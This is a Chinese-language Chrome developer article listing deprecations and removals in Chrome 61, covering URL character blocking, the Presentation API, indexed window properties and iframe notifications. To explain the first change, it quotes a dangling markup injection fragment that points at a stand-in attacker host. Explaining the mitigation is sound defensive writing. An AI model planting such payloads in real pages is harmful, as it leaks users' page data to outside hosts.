在几乎每个版本的 Chrome 中,我们都会对该产品及其性能以及 Web 平台的功能进行大量更新和改进。本文介绍了 Chrome 61 中已废弃和移除的功能。Chrome 61 自 8 月 3 日起处于 Beta 版阶段。此列表随时都可能发生变化。
安全和隐私权
屏蔽网址包含“\n”和“<”字符的资源
一种名为悬空标记注入的黑客攻击会使用经过截断的网址将数据发送到外部端点。例如,假设有一个包含 <img src='https://evil.com/? 的网页。由于网址没有闭引号,浏览器会读取到下一个出现的引号,并将被封闭的字符视为单个网址。
Chrome 61 通过限制 href 和 src 属性中允许使用的字符集来缓解此漏洞。具体而言,当 Chrome 遇到新行字符 (\n) 和小于字符 (<) 时,会停止处理网址。
如果开发者有在网址中使用换行符和小于号字符的合理用例,则应改为对这些字符进行转义。
移除意图 | Chromestatus 跟踪器 | Chromium bug
在不安全的上下文中废弃并移除 Presentation API
我们发现,在不安全的来源中,Presentation API 可用作黑客入侵途径。由于显示屏没有地址栏,因此该 API 可用于欺骗内容。还可以从正在运行的演示文稿中提取数据。
为了与 Blink 的移除不安全来源的强大功能的目标保持一致,我们计划在不安全的上下文中弃用并移除对 Presentation API 的支持。从 Chrome 61 开始,PresentationRequest.start() 将不再适用于不安全的源。
移除意图 | Chromestatus 跟踪器 | Chromium bug
JavaScript
禁止在窗口上定义编入索引的属性
以前,某些浏览器允许使用以下 JavaScript 赋值:
window[0] = 1;
当前 HTML 规范指出,这明确违反了 JavaScript 规范。因此,Chrome 61 中移除了此功能。自 2016 年 2 月起,Firefox 已符合相关政策。
移除了在不安全的 iframe 中使用通知的功能
来自 iframe 的权限请求可能会让用户感到困惑,因为很难区分包含页面的来源和发出请求的 iframe 的来源。如果请求范围不明确,用户就很难判断是否授予权限。
禁止在 iframe 中显示通知,也将使通知权限要求与推送通知要求保持一致,从而减小开发者的阻力。
需要此功能的开发者可以打开新窗口来请求通知权限。